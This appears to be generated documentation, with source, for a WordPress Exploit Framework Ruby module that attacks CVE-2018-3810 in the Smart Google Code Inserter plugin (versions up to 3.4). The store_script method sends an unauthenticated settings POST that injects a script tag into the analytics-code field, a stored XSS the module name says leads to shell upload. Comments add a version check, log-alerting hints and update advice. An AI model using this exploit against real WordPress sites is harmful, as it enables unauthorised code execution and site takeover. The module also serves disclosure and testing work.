class Wpxf::Exploit::SmartGoogleCodeInserterXssShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 6
# Sets up the module and registers its descriptive metadata.
#
# Runs the superclass initializer first, then passes update_info the module
# name, the credited authors, the advisory references and the date string.
# The name records the affected range (plugin versions <= 3.4) and that the
# stored XSS needs no authentication, which lets a reader tie this module to
# CVE-2018-3810 / WPVDB 8987 when triaging exposure.
def initialize
  super

  credits = [
    'Benjamin Lim', # Disclosure
    'rastating'     # WPXF module
  ]
  advisories = [
    ['CVE', '2018-3810'],
    ['WPVDB', '8987']
  ]

  update_info(
    name: 'Smart Google Code Inserter <= 3.4 Unauthenticated Stored XSS Shell Upload',
    author: credits,
    references: advisories,
    date: 'Jan 01 2018'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 23
# Version check for the smart-google-code-inserter plugin.
#
# Delegates to check_plugin_version_from_readme with the plugin slug and
# '3.5' and returns that helper's result unchanged.
# NOTE(review): '3.5' is presumably the first fixed release (the module name
# gives the affected range as <= 3.4) -- confirm against the helper.
# NOTE(review): the helper name suggests the version is read from the
# plugin's readme; a readme can be stale or removed, so treat the result as
# an indication and confirm the installed version on the host.
def check
  plugin_slug = 'smart-google-code-inserter'
  fixed_in = '3.5'
  check_plugin_version_from_readme(plugin_slug, fixed_in)
end
store_script()
# File lib/wpxf/modules/exploit/xss/stored/smart_google_code_inserter_xss_shell_upload.rb, line 27
# Submits the plugin's settings form with a script element in the
# analytics-code field.
#
# Sends a POST to options-general.php under the admin URL with page=smartcode
# and action=savegooglecode. The 'sgcgoogleanalytic' field wraps
# xss_include_script in <script> tags; 'sgcwebtools' is sent empty.
# Returns whatever execute_post_request returns.
#
# Defender notes: per the module name, affected versions (<= 3.4,
# CVE-2018-3810) accept this save without authentication. Requests to
# options-general.php?page=smartcode carrying action=savegooglecode from a
# client with no admin session are worth alerting on in web logs. Updating
# the plugin beyond the affected range is the remediation; afterwards the
# plugin's saved settings should be checked for unexpected script content.
def store_script
  settings_url = normalize_uri(wordpress_url_admin, 'options-general.php')
  form_fields = {
    'sgcgoogleanalytic' => "<script>#{xss_include_script}</script>",
    'sgcwebtools' => '',
    'button' => 'Save Changes',
    'action' => 'savegooglecode'
  }

  execute_post_request(
    url: settings_url,
    params: { 'page' => 'smartcode' },
    body: form_fields
  )
end